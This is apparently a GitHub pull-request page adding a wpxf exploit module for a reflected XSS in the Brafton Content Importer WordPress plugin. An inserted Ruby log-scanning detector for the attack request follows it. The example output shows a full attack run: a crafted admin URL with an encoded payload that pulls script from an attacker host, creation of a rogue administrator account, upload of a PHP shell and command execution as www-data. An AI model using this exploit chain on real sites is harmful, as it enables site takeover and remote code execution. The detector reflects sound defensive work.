This repository was archived by the owner on Oct 22, 2020. It is now read-only.

@phyushin
This module exploits the "Brafton Content Importer" WordPress plugin; the plugin can be downloaded from the following URL:
https://github.com/BraftonSupport/BraftonWordpressPlugin/archive/v3.4.5.zip

Fixed in: 3.4.8
Note: the link for the plugin is the latest release [3.4.5] on GitHub but the vulnerability was fixed in 3.4.8

References:

Example output:

wpxf > use exploit/brafton_content_importer_reflected_xss_shell_upload 

  [+] Loaded module:
      #<Wpxf::Exploit::BraftonContentImporterReflectedXssShellUpload:0x00000002f3a050>

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set host 192.168.0.27

  [+] Set host => 192.168.0.27

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set xss_host 192.168.0.20

  [+] Set xss_host => 192.168.0.20

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x00000002edce78>

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.27/wp-admin/admin.php?page=BraftonArticleLoader&tab=eval(String.fromCharCode(101,118,97,108,40,100,101,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,47,118,97,114,37,50,48,97,37,50,48,37,51,68,37,50,48,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,37,50,56,37,50,50,115,99,114,105,112,116,37,50,50,37,50,57,37,51,66,97,46,115,101,116,65,116,116,114,105,98,117,116,101,37,50,56,37,50,50,115,114,99,37,50,50,37,50,67,37,50,48,37,50,50,104,116,116,112,37,51,65,37,50,70,37,50,70,49,57,50,46,49,54,56,46,48,46,50,48,37,51,65,56,48,56,48,37,50,70,97,79,116,72,89,84,120,66,37,50,50,37,50,57,37,51,66,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,37,50,56,97,37,50,57,37,51,66,47,46,115,111,117,114,99,101,41,41))

  [-] Started HTTP server on 0.0.0.0:8080
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, DHnhab:erTPSVpUlA
  [-] HTTP server stopped
  [-] Authenticating with WordPress using DHnhab:erTPSVpUlA...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.27/wp-content/plugins/FSAfGcekVl/UUkabnbIWV.php...
  [+] Result: www-data
  [+] Execution finished successfully
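
A defender-side check for the request pattern shown in the output above, added here as an example and not part of the pull request or of wpxf: it scans access-log lines for `page=BraftonArticleLoader` requests whose `tab` value is not a plain identifier. The allow-list pattern, the tab name `general` and the log lines are constructed assumptions.

```ruby
require 'uri'

# Assumption: legitimate `tab` values are short identifiers; the plugin's real
# tab names are not listed on this page.
SAFE_TAB = /\A[A-Za-z0-9_-]{0,32}\z/
# Client address and request target from a combined-format access log line.
LOG_LINE = /\A(\S+) .*?"(?:GET|POST) (\S+) HTTP\/[\d.]+"/

# Returns the decoded `tab` value if the request targets the Brafton loader
# page with a value outside the allow-list, otherwise nil.
def suspicious_tab(target)
  path, query = target.split('?', 2)
  return nil unless query && path.end_with?('/wp-admin/admin.php')
  params = URI.decode_www_form(query).to_h
  return nil unless params['page'] == 'BraftonArticleLoader'
  tab = params['tab']
  tab && tab !~ SAFE_TAB ? tab : nil
rescue ArgumentError
  # Malformed percent-encoding or non-ASCII bytes aimed at this page: report it.
  query.include?('BraftonArticleLoader') ? query : nil
end

# Returns one record per flagged log line: the client address and the tab value.
def scan(lines)
  lines.filter_map do |line|
    m = LOG_LINE.match(line) or next
    tab = suspicious_tab(m[2]) or next
    { client: m[1], tab: tab }
  end
end

# Constructed sample log lines (documentation addresses, shortened tab values).
SAMPLE = [
  '192.0.2.10 - - [21/Jan/2017:10:00:00 +0000] "GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=general HTTP/1.1" 200 512',
  '192.0.2.11 - - [21/Jan/2017:10:01:00 +0000] "GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=eval(String.fromCharCode(0)) HTTP/1.1" 200 512',
  '192.0.2.12 - - [21/Jan/2017:10:02:00 +0000] "GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=eval%28String.fromCharCode%280%29%29 HTTP/1.1" 200 512',
  '192.0.2.13 - - [21/Jan/2017:10:03:00 +0000] "GET /wp-admin/admin.php?page=other&tab=%3Cb%3E HTTP/1.1" 200 512'
].freeze

scan(SAMPLE).each { |hit| puts "#{hit[:client]} tab=#{hit[:tab].inspect}" }
```

Because the value is decoded before matching, the percent-encoded request from 192.0.2.12 is flagged alongside the raw one.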

@rastating rastating merged commit 7ece71f into rastating:development Jan 21, 2017
@rastating
This one is merged too 👍

@phyushin phyushin deleted the brafton_content_importer_reflected_xss branch February 23, 2018 21:42